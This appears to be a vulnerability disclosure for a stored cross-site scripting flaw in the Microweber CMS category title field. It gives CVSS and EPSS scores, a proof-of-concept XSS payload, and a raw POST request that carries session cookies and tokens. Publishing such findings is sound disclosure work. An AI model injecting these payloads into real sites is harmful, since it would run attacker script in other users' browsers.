Ahkecha13DD2F4D-0C7F-483E-A771-E1ED2FF1C36FStored XSS on Categories
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.9 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
17.9%
Description
Title parameter in the body of POST request when creating/editing a category is vulnerable to stored XSS.
Proof of Concept
1 - Go to https://demo.microweber.org/demo/admin/view:content/action:categories
2 - Create a category or edit an existing one.
3 - Modify the title to an XSS Payload: "><iframe onload=prompt(1)>
4 - Save it, And upon visiting categories or shop / when users visit the website an XSS popup will appear.
Screenshots and Video POC
https://drive.google.com/drive/folders/155GUYDLkFpgezR8LiaI3rl4Ej57aDoKq?usp=sharing
Post Request Body
POST /demo/api/category/1 HTTP/1.1
Host: demo.microweber.org
Cookie: XSRF-TOKEN=eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0%3D; _ga=GA1.2.1359565319.1659876932; _gid=GA1.2.1567963331.1659876932; laravel_session=42b3afHcNXtB19Y9WXCTYwCrkC5rdAzi7VTQLPQO; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; twk_uuid_599594841b1bed47ceb0520f=%7B%22uuid%22%3A%221.4glA0q3vlKWq3BfdxhMkPX4cwzUwXXo76pb7kSGBL4d01XmOfGrB5YUtfJiyyjGf3YtQ6HwVYvpP2MFZv1Y2QXpWjDE2AlDvkxDrT0tRsmrXgc3eNutuKPNKkVG9btJEhtmKHMjNDxMVUPhAM1k%22%2C%22version%22%3A3%2C%22domain%22%3A%22microweber.org%22%2C%22ts%22%3A1659876933445%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/category/1/edit
Content-Length: 348
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Xsrf-Token: eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/category/1/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
id=1&rel_type=content&rel_id=8&data_type=category&parent_id=0&_method=PATCH&title=%22%3E%3Ciframe+onload%3Dprompt(document.domain)%3E&category-parent-selector=8&description=&position=0&thumbnail=&url=accessoaries&users_can_create_content=0&category_subtype=default&category_meta_title=&category_meta_description=&category_meta_keywords=&is_hidden=0
Related
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.9 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
17.9%